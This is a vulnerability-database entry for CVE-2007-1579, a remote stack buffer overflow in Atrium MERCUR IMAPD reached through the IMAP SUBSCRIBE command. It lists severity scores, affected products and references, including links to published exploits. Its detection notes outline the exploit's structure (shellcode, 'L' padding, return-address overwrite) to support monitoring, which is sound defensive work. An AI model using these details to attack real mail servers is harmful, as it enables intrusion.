CVE-2007-1579
Published 2007-03-21
CVE-2007-1579: Stack-based buffer overflow in Atrium MERCUR IMAPD allows remote attackers to have an unknown impact via a certain SUBSCRIBE command.
Priority: P2 65 · critical · 10 (CVSS 2.0)
AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 56.21% (98.9th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| atrium_software | mercur_messaging_2005 | — | — |
| atrium_software | mercur_messaging_2005 | — | — |
Detection & IOCs
- Trigger is an IMAP SUBSCRIBE command sent after authentication; monitor for oversized SUBSCRIBE payloads on TCP/143 targeting Atrium MERCUR IMAPD.
- The exploit payload is padded with repeated 'L' bytes after the shellcode before the return address overwrite; large SUBSCRIBE payloads containing repetitive padding bytes are a strong indicator of exploitation.
No detection rules found.
No writeups or analysis indexed.
- http://secunia.com/advisories/24619
- http://www.immunitysec.com/partners-index.shtml
- http://www.osvdb.org/33546
- http://www.securityfocus.com/bid/23050
- http://www.vupen.com/english/advisories/2007/1092
- https://exchange.xforce.ibmcloud.com/vulnerabilities/33216
- https://www.exploit-db.com/exploits/3537
- https://www.immunityinc.com/downloads/immpartners/MercurImapSubscribe.tar
2007-03-21
Published